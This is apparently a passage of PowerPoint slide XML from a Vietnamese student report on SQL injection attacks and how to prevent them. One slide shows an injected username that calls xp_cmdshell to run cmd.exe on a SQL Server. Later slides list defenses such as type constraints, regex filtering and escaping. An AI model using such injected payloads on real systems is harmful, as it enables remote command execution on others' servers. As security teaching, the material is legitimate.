      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3487404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6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="486">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48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6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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86">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:sub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735862" y="800581"/>
            <a:ext cx="7686301" cy="3009419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công bằng stored-procedures sẽ gây hậu quả lớn nếu ứng dụng được thực thi với quyền quản trị hệ thống 'sa'.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ví </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dụ, nếu ta thay đoạn mã tiêm vào dạng: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: ' ; EXEC xp_cmdshell ‘cmd.exe dir C: '.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hệ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thống sẽ thực hiện lệnh liệt kê thư mục trên ổ đĩa C:\ cài đặt server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Việc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>phá hoại kiểu nào tuỳ thuộc vào câu lệnh đằng sau cmd.exe. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nếu cài SQL ở chế độ mặc định thì SQL chạy trên nền SYSTEM, tương đương mức truy cập ở Windows. Có thể dùng master..xp_cmdshell để thi hành lệnh từ xa.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="215211"/>
            <a:ext cx="7262798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công sử dụng stored-procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227599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788920" y="3312854"/>
            <a:ext cx="5860303" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN III: Cách phòng chống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 491"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225238" y="265325"/>
            <a:ext cx="8770620" cy="172786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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pP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TÌM HIỂU CÁC DẠNG TẤN CÔNG SQL INJECTION </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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XÂY DỰNG VÀ DEMO CÁC KỊCH BẢN TẤN CÔNG SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3000" dirty="0">
              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2650581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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="215211"/>
            <a:ext cx="7262798" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="865073679"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1408789" y="1371600"/>
          <a:ext cx="6340447" cy="3108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678180" y="416380"/>
            <a:ext cx="7729883" cy="106182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vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Như vậy, có thể thấy lỗi SQL Injection khai thác những bất cẩn của các lập trình viên phát triển ứng dụng web khi xử lí các dữ liệu nhập vào để xây dựng câu lệnh SQL. Để phòng chống có một số biện pháp sau: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684020" y="1854886"/>
            <a:ext cx="381000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935480" y="2756803"/>
            <a:ext cx="381000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684020" y="3660826"/>
            <a:ext cx="381000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350206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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="215211"/>
            <a:ext cx="7262798" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678180" y="416380"/>
            <a:ext cx="7729883" cy="39703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vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dưới đây là cách phòng chống đối với dạng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công vượt qua kiểm tra đăng nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Luôn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ràng buộc kiểu dữ liệu: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Expression: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>để loại bỏ đi các ký tự lạ hoặc các ký tự không phải là số. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dùng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>các hàm có sẵn để giảm thiểu lỗi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sử </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dụng thêm hàm mysqli_real_escape_string để chuyển đổi một chuỗi thành một query an toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486012" y="838457"/>
            <a:ext cx="4724400" cy="1225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Text&#10;&#10;Description automatically generated with low confidence"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="13345"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2048206" y="2504627"/>
            <a:ext cx="4989830" cy="720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2" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730720" y="4086709"/>
            <a:ext cx="5696585" cy="621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2787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ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1927860"/>
            <a:ext cx="7772400" cy="1958281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="10000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THANKS!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43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="643"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="240000">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="400"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="643"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="600"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="643"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="120000">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="800"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="64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Shape 659"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055370" y="336945"/>
            <a:ext cx="6996600" cy="715800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NỘI DUNG BÁO CÁO:</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 660"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601435" y="1376392"/>
